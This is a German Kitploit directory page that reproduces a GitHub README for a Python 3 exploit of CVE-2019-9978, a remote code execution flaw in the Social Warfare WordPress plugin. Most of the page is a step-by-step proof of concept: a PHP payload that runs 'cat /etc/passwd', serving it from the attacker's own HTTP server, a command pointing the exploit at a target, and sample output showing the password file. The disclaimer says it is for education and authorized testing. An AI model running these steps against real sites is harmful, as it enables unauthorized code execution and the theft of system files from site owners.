Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-9978 — Eine Sicherheitslücke zur Entfernten Codeausführung (RCE) im Social Warfare Plugin für WordPress, die Versionen unter 3.5.3 betrifft. | Kitploit
Tools/GitHubGitHub/echoosso/cve-2019-9978
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubechoosso/cve-2019-9978

CVE-2019-9978

Eine Sicherheitslücke zur Entfernten Codeausführung (RCE) im Social Warfare Plugin für WordPress, die Versionen unter 3.5.3 betrifft.

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-9978 - Social Warfare WordPress Plugin RCE < 3.5.3

Eine Remote Code Execution (RCE)-Sicherheitslücke im Social Warfare-Plugin für WordPress, die alle Versionen unter 3.5.3 betrifft.


💡 Motivation

Der ursprüngliche öffentliche Exploit wurde in einer veralteten Python-Version geschrieben und läuft in modernen Umgebungen nicht mehr richtig.
Ich habe den Exploit neu geschrieben, sodass er vollständig mit Python 3 kompatibel ist – einfacher zu verwenden, zu verstehen und in moderne Tools zu integrieren.


Proof of Concept (PoC)

✅ Schritt 1 – Payload erstellen

Erstelle eine Datei namens payload.txt mit folgendem Inhalt:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ Schritt 2 – Python HTTP-Server starten

Nutze Python, um deine Payload bereitzustellen:

root@kitploit:~
python3 -m http.server 8000

Dadurch wird deine payload.txt unter folgender Adresse erreichbar:

root@kitploit:~
http://<deine-ip>:8000/payload.txt

✅ Schritt 3 – Exploit ausführen

root@kitploit:~
python3 CVE-2019-9978.py --target http://<ziel-ip>/wordpress \
                         --payload-uri http://<deine-ip>:8000/payload.txt

Erwartete Ausgabe

Falls das Ziel verwundbar ist, erhältst du eine Ausgabe ähnlich wie:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Screenshots

HTTP-Server empfängt Anfrage

http-server

Erfolgreiche Exploit-Ausführung

exploit

Payload-Dateiinhalt

payload


🧬 Falls diese Payload deinen Tag versüßt hat, würde ein ⭐ mir den Tag versüßen.

Technische Details

  • Plugin: Social Warfare
  • Betroffene Versionen: < 3.5.3
  • CVE: CVE-2019-9978
  • Sicherheitslückentyp: Remote Code Execution (RCE)
  • Ursprünglicher Autor: @hash3liZer
  • Forscher: Luka Sikic

Danksagungen

  • Exploit-Autor: @hash3liZer
  • Python-3-Überarbeitung: @echosso

⚠️ Haftungsausschluss: Dieses Repository dient ausschließlich Bildungs‑ und ethischen Testzwecken.
Die unbefugte Nutzung dieses Exploits gegen Systeme, die dir nicht gehören, ist strengstens untersagt.

Tool herunterladen